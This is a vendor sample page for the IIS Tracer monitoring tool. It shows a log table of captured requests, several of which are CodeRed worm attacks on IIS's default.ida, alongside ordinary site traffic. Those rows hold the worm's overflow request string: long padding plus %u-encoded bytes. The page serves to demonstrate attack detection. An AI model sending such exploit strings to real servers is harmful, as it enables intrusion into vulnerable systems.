Interesting captures (CodeRed attack) with IIS Tracer web site monitoring tool

ActiveX/VBSScript registry editor  ActiveX NT User account manager  Export MDB/DBF from ASP
Url replacer, IIS url rewrite Active LogFile  Email export  ActiveX/ASP Scripting Dictionary object
 IISTracer, real-time IIS monitor
 Huge ASP upload - upload files with progress.
Sample page
<<IIS Tracer web site monitoring tool
CodeRed attack to IIS server
CodeRed sends data to the default.ida script. Next table shows how can IIS Tracer web site monitoring tool monitor CodeRed activity from another servers to your server.

Start
Time
Inraw
[B]
InContent
length[B]
Outraw
[B]
OutContent
length[B]
Running
[ms]
StateClientURL
13:59:13.554235833794833252614229Endofrequest217.11.239.22GEThttp://217.11.235.107/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:03:26.104033790un543469Authentication217.11.239.22GEThttp://217.11.235.103/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:09:54.0830ns106981046914147Endofrequest62.24.71.131GEThttp://g.aliaweb.cz/cphistory.obr?LV=1&ID=965&/BLBUNIFO.gif
14:09:54.8210ns352373480513088Endofrequest195.47.108.147GEThttp://zpravodaj.cz/l.asp?LT=ptEkonomika&SF=Ctenost_Celkem
14:10:01.82723583379483325236086Endofrequest217.11.239.22GEThttp://217.11.235.108/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:10:50.17123583379465325235595Endofrequest217.11.239.22GEThttp://217.11.235.111/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
14:11:01.0480ns298242958241655Endofrequest212.20.109.156GEThttp://r.kde.cz/js/nh.js
14:11:25.0650ns13302130745978Endofrequest213.175.33.146GEThttp://e.kde.cz/ban/zpravodaj/zpr_zelen.gif
14:11:27.3090ns28849286246274Endofrequest212.20.120.122GEThttp://r.kde.cz/ban/exchange/horizont2.gif
14:11:35.1570ns298242958210039Endofrequest195.144.126.39GEThttp://r.kde.cz/js/nh.js
14:11:47.5830ns26672264449138Endofrequest195.212.204.131GEThttp://e.kde.cz/ban/akcie/fio_ban1.gif
14:11:50.3710ns288492862411891Endofrequest193.165.145.88GEThttp://r.kde.cz/ban/exchange/horizont2.gif
14:12:28.2970ns0un1275URLMapping194.228.119.18GEThttp://www.ariadna.cz/ariadna/getCal.asp?ID=44&head=1&Langver=1&T=MGDRIOC&sort=1&DESC=1

© 1996 2007 Antonin Foller, Motobit Software, help@pstruh.cz